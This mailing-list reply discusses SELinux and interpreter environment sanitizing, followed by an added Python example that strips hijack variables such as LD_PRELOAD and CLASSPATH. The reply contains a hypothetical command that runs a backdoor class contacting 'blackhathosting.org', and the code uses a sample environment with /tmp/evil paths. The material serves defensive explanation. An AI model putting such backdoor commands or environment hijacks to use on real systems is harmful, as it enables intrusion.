Colin Walters walters-at-redhat.com |fedora| wrote:
> The major threat here is environment variables, right?

That one is a minor issue in my book, but certainly worth trying to enforce in some way.

> I wonder what all would break if we changed e.g. bash and python to by default clean
> the environment before executing the script if it was executed from a
> domain transition

Could be a lot. If you sanitize classpath or PERL5LIB a lot could break, but if you don't you might not be running what you think you are, which leads back to what I was inquiring about.
So just to clarify, what's the difference between a user running a script file that does exec "java ./MyClass.class" and a stack overrun causing a browser with a smashed stack to save a MyBackdoor.class to the local file system and execing "java ./MyBackdoor.class -irc blackhathosting.org"?
In both cases it's the same user, and in both cases it's the same java VM binary. The java binary is likely the only process that knows enough to enforce anything here based on when, what, and where things are run by the user. The browser may try to limit what permissions are passed to the exec call, but with a smashed stack overrun can you trust it to? Not me, at least not yet. This looks to me like the java VM needs to be hacked with the SELinux API in order to have any confidence in it, but in some ways that duplicates the java security manager's role in life. Perhaps we just need a specialized Java security manager, perhaps much more. Dunno. But it's a common issue with desktop actions and shells, as well as Perl, Python, Ruby, just pick your poison...
I guess what I was looking for was a philosophy for how to handle this nebulous issue. The more likely answer is each has its own issues and must be dealt with separately in its own special way and must be changed to deal with SE. I am hoping for a better option as there is much in SE I don't know yet and I do want to understand it in great detail some way down the road.
Thanks.
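As an added illustration of the "clean the environment before executing the script" idea discussed above (this is example code written for this page, not code from the thread's participants or from any SELinux, bash or python project), the block below shows the two policies the reply weighs against each other: a denylist that strips only the variables known to redirect what an interpreter or the dynamic loader loads (least breakage, as with CLASSPATH and PERL5LIB), and a strict allowlist that keeps a few harmless variables and pins PATH (most breakage, but nothing the caller set can steer the interpreter). The variable names are the real ones honoured by java, perl, python, ruby, sh/bash and ld.so; which of them to include, the allowlist, the SAFE_PATH value and the sample environment are this example's own assumptions.

```python
"""Environment sanitizing before exec (added example, not from the thread)."""
import os
import subprocess
import sys

# Variables through which a caller can change what gets executed or loaded.
# The names are honoured by the named programs; the selection is this example's.
HIJACK_EXACT = frozenset({
    "CLASSPATH", "JAVA_TOOL_OPTIONS", "_JAVA_OPTIONS",   # java
    "PERL5LIB", "PERLLIB", "PERL5OPT",                    # perl
    "PYTHONPATH", "PYTHONHOME", "PYTHONSTARTUP",          # python
    "RUBYLIB", "RUBYOPT",                                 # ruby
    "BASH_ENV", "ENV", "SHELLOPTS", "IFS", "CDPATH",      # sh / bash
})
# Dynamic-loader controls (LD_PRELOAD, LD_LIBRARY_PATH, ...) match by prefix.
HIJACK_PREFIXES = ("LD_", "DYLD_")

# Strict mode keeps only these. PATH is pinned in both modes (assumed safe value),
# since a caller-controlled PATH decides which "java" or "perl" gets found.
STRICT_KEEP = frozenset({"HOME", "USER", "LOGNAME", "LANG", "TZ", "TERM"})
SAFE_PATH = "/usr/bin:/bin"


def is_hijack_var(name):
    """True if NAME can redirect what an interpreter or loader executes."""
    return name in HIJACK_EXACT or name.startswith(HIJACK_PREFIXES)


def sanitize_env(env, strict=False):
    """Return a cleaned copy of ENV under the denylist or the strict allowlist."""
    if strict:
        clean = {k: v for k, v in env.items() if k in STRICT_KEEP}
    else:
        clean = {k: v for k, v in env.items() if not is_hijack_var(k)}
    clean["PATH"] = SAFE_PATH
    return clean


def run_clean(argv, env=None, strict=False):
    """Run ARGV with a sanitized environment; returns the CompletedProcess."""
    base = os.environ if env is None else env
    return subprocess.run(argv, env=sanitize_env(base, strict),
                          capture_output=True, text=True)


# Constructed sample: what a compromised caller might hand an interpreter.
SAMPLE_ENV = {
    "PATH": "/tmp/evil:/usr/bin:/bin",
    "HOME": "/home/user",
    "USER": "user",
    "LD_PRELOAD": "/tmp/evil/hook.so",
    "PERL5LIB": "/tmp/evil/perl",
    "PYTHONPATH": "/tmp/evil/py",
    "CLASSPATH": "/tmp/evil/MyBackdoor.jar",
    "EDITOR": "vi",
}


def demo():
    lenient = sanitize_env(SAMPLE_ENV)
    strict = sanitize_env(SAMPLE_ENV, strict=True)
    print("denylist keeps:", sorted(lenient))
    print("strict keeps:  ", sorted(strict))
    # Confirm a child interpreter really does not see the hijack variables.
    probe = [sys.executable, "-c",
             "import os; print(','.join(sorted(k for k in os.environ "
             "if k.startswith(('LD_', 'PERL5', 'PYTHON', 'CLASSPATH')))))"]
    print("child sees:", repr(run_clean(probe, SAMPLE_ENV).stdout.strip()))
    return lenient, strict


if __name__ == "__main__":
    demo()
```

The denylist is the cheaper policy to roll out because existing users of CLASSPATH or PERL5LIB keep working unless they rely on one of the listed variables; the strict policy is what you want when the caller may already be compromised, at the cost of breaking anything that legitimately needed a non-default module path.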